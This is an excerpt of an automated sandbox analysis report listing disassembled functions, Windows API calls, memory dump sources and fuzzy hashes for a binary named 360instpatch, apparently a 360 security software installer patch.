                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                              • String ID: tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 2422867632-613191693
                                                                                                                                                                                                              • Opcode ID: 929c62f73469887e6e9f2f6a61c51652e4ebd06cc7d6089ca08778fa331d555c
                                                                                                                                                                                                              • Instruction ID: 201185b0e11984f4da07b31f4cc112057d666d31ecc7c5b0edb94fcec482ea8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 929c62f73469887e6e9f2f6a61c51652e4ebd06cc7d6089ca08778fa331d555c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40018432120327EEDF108F21CC40AA773BCEB86354B00446EED6586160E7B6A545CBE1
                                                                                                                                                                                                              Function 00B1E7D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,00B1E9A6,?), ref: 00B1E80F
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _memset.LIBCMT ref: 00B1EA12
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncpy.LIBCMT ref: 00B1EA29
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA3C
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA53
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA66
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA7D
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA90
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EAA7
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: GetActiveWindow.USER32 ref: 00B1EAB7
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: MessageBoxW.USER32(00000000), ref: 00B1EABE
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: __wcsnicmp.LIBCMT ref: 00B1EADA
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 00B1EB0E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
                                                                                                                                                                                                              • String ID: 360
                                                                                                                                                                                                              • API String ID: 4220467963-1990796034
                                                                                                                                                                                                              • Opcode ID: 020420357f3db4a4690149ee93c1a8ebf225175b227657a67159fc650e551118
                                                                                                                                                                                                              • Instruction ID: 3b2c22dddaad25cf2b0fae78e3c25a572c337d9934993328eabb39416f92e98f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020420357f3db4a4690149ee93c1a8ebf225175b227657a67159fc650e551118
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE0D872215310BADB10A7109C0AFDB63CCDF50755F10887BFA15E2080E7B0E85487A6
                                                                                                                                                                                                              Function 6BF26F06 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,6BF0D3A2,?,?,?,?,6BF0D3A2), ref: 6BF26F2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID: SOFTWARE\LiveUpdate360
                                                                                                                                                                                                              • API String ID: 2289755597-1248664019
                                                                                                                                                                                                              • Opcode ID: 2307105685ec8b47601c7f923cd1f17c2e34006a0bfe5492d76b1ef61d60118e
                                                                                                                                                                                                              • Instruction ID: 4007415475c7db8b46ee1e2936e6f72bebd2c6e3d79ae2a2f13a5021e81e4259
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2307105685ec8b47601c7f923cd1f17c2e34006a0bfe5492d76b1ef61d60118e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6E0B6B6A60109BEEB08DBA5DC46EFE76ACD714348F204299BA02E2141E975AA449730
                                                                                                                                                                                                              Function 00B14410 Relevance: 3.2, APIs: 2, Instructions: 226COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00B14728,00000000,00000000,00000CCC,00000040), ref: 00B14576
                                                                                                                                                                                                                • Part of subcall function 00B13E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00B14DC5,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B13E9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                                                                                              • Opcode ID: 034c737a1801203b05461abcb424ff5ed812fb5abe1b8cdd26d51c3fbe6dccbe
                                                                                                                                                                                                              • Instruction ID: b4ce0a4429fcfc007eb465e6753c1520984621c14653bd37cc16b875d40ef651
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 034c737a1801203b05461abcb424ff5ed812fb5abe1b8cdd26d51c3fbe6dccbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB717E71604702AFD714DF28D880AAAB7E5FB88310F944AADF85893741E735E994CBD2
                                                                                                                                                                                                              Function 6BEEA0F5 Relevance: 3.2, APIs: 2, Instructions: 176fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BEEA0FC
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,0000000C,?,?,?,?,?,?,?,?,00000024), ref: 6BEEA2FC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteFileH_prolog3_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1756631919-0
                                                                                                                                                                                                              • Opcode ID: 83c672bb88587deef114488307997487dc45030dfe5beb3278c8d23882fe7914
                                                                                                                                                                                                              • Instruction ID: 726f454449ec892a5bae7a2bab9ed9e04814ee20c37bbcad275a1b17e355f8ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83c672bb88587deef114488307997487dc45030dfe5beb3278c8d23882fe7914
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7651B435184A059BCB224F74C801A6EB6F3AF85704F30941CF46A527A0DB3AD463D731
                                                                                                                                                                                                              Function 6BF2E190 Relevance: 3.2, APIs: 2, Instructions: 169COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF2E197
                                                                                                                                                                                                                • Part of subcall function 6BF2C56B: GetCurrentThreadId.KERNEL32 ref: 6BF2C56F
                                                                                                                                                                                                                • Part of subcall function 6BF2C56B: GetTickCount.KERNEL32 ref: 6BF2C583
                                                                                                                                                                                                                • Part of subcall function 6BF2C56B: GetTickCount.KERNEL32 ref: 6BF2C595
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF2E1A3
                                                                                                                                                                                                                • Part of subcall function 6BF1A60A: __EH_prolog3.LIBCMT ref: 6BF1A611
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3$CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1756952440-0
                                                                                                                                                                                                              • Opcode ID: 2b6705f31a29a84b96472cd50586219c18397d1eb8623e92700774cf55af962b
                                                                                                                                                                                                              • Instruction ID: ce38fd0dafadeb5db0d0fe90ebea3af3a5b8d931553be9e9b64e24c4f107936a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b6705f31a29a84b96472cd50586219c18397d1eb8623e92700774cf55af962b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C61F772C1010A9FCF01DFF4D891AEDBBB5AF19314F204469E521B72A0EB39AA15CF60
                                                                                                                                                                                                              Function 00B48119 Relevance: 3.1, APIs: 2, Instructions: 141COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientRectShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2134488367-0
                                                                                                                                                                                                              • Opcode ID: 1b2823dfcb172f94c178c14a02cfd0bf09d87d33296e37c9b6cb5e772dc6eed0
                                                                                                                                                                                                              • Instruction ID: 460e222c8c30d4aaabd7818e52a8c5128224ecdeef1a1b719a1b91060aa5fa42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b2823dfcb172f94c178c14a02cfd0bf09d87d33296e37c9b6cb5e772dc6eed0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4513B71900209AFDF10DFA4C888DAEBBF8FF59344B14449AF855EB261EB31DA46DB50
                                                                                                                                                                                                              Function 00B80001 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 00B800AC
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00B800EF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                              • Opcode ID: 536cb6291de61f2fab5efb151585312b75a96548879335c57f2bbf11fd3e87e6
                                                                                                                                                                                                              • Instruction ID: e76fef5ebe2f69fd6bbf19e9aff012442313152f39b9c78a3c7bdb748ab6da36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 536cb6291de61f2fab5efb151585312b75a96548879335c57f2bbf11fd3e87e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D318B71A102099FEB70EEA5CC45BAEB3B8FF45354F240479E858E7292DB309909CF10
                                                                                                                                                                                                              Function 6BF1AE39 Relevance: 3.1, APIs: 2, Instructions: 91networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF1AE44
                                                                                                                                                                                                                • Part of subcall function 6BF16EF2: GetTickCount.KERNEL32 ref: 6BF16EFF
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 6BF1AEAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1305442257-0
                                                                                                                                                                                                              • Opcode ID: 1399e4966054b0e52a041e9416c461225680ba3fec9a3748c0b3832c430da1d8
                                                                                                                                                                                                              • Instruction ID: 5ad650c484549ecc7c69870ddf6901107279e9b1008e1951099bdbcf4814d14b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1399e4966054b0e52a041e9416c461225680ba3fec9a3748c0b3832c430da1d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD319372A04605BFCF15DBB4C885EEFBBB9FF04354F008959E115A71A0DB38A915DB60
                                                                                                                                                                                                              Function 6BEE867B Relevance: 3.1, APIs: 2, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1964944973-0
                                                                                                                                                                                                              • Opcode ID: 12fdfbf1302b8cdd142340ec34aa1ae1cce60caef44bb93a2ad374210687c381
                                                                                                                                                                                                              • Instruction ID: 06c5494d3e3f7f887ceca752b0bc830d26343e111b2aa8b13805ef0a9e5eab1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12fdfbf1302b8cdd142340ec34aa1ae1cce60caef44bb93a2ad374210687c381
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9113832A04112ABDB04CF64C841B5CB376FF54314F30821AE919EB2C0D779AAA2C7E1
                                                                                                                                                                                                              Function 6BEE878F Relevance: 3.1, APIs: 2, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1964944973-0
                                                                                                                                                                                                              • Opcode ID: 3516abe15e857e6f40089f4e6b6af020d90765784581153068c3399b7bf6cb0a
                                                                                                                                                                                                              • Instruction ID: 3ad14469e09dc7b40e7926a1814c92e7892562c27f03c785d43e1212e2a6da8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3516abe15e857e6f40089f4e6b6af020d90765784581153068c3399b7bf6cb0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1311E972A00105EBD704CF64C85175DF3A6BF54314F70811AE918E76C0DB79BAA2CBE5
                                                                                                                                                                                                              Function 00B620A9 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00B620B3
                                                                                                                                                                                                                • Part of subcall function 00B47451: BeginPaint.USER32(?,?), ref: 00B4746E
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00B620E0
                                                                                                                                                                                                                • Part of subcall function 00B47323: CreateCompatibleDC.GDI32(?), ref: 00B47347
                                                                                                                                                                                                                • Part of subcall function 00B47323: SelectObject.GDI32(?,?), ref: 00B4736E
                                                                                                                                                                                                                • Part of subcall function 00B47323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00B47387
                                                                                                                                                                                                                • Part of subcall function 00B56537: GetWindowRect.USER32(?,00000000), ref: 00B56554
                                                                                                                                                                                                                • Part of subcall function 00B61F15: __EH_prolog3.LIBCMT ref: 00B61F1C
                                                                                                                                                                                                                • Part of subcall function 00B61F15: IsWindowEnabled.USER32(?), ref: 00B61F26
                                                                                                                                                                                                                • Part of subcall function 00B61F15: GetClientRect.USER32(?,?), ref: 00B61F5D
                                                                                                                                                                                                                • Part of subcall function 00B61F15: GetWindowTextW.USER32(?,00000000,00000080), ref: 00B61FA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: RectWindow$Client$BeginCompatibleCreateEnabledH_prolog3H_prolog3_ObjectPaintSelectTextViewport
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2602395704-0
                                                                                                                                                                                                              • Opcode ID: 714cdcec14007ae9ffffe19332fd31a4fffb1df7e6f1b001b09f076baf9b5393
                                                                                                                                                                                                              • Instruction ID: 37eb98849ce4d224ff14c3d181f1d722b33c1dcb9f898c141c15e16de7fd2f7e
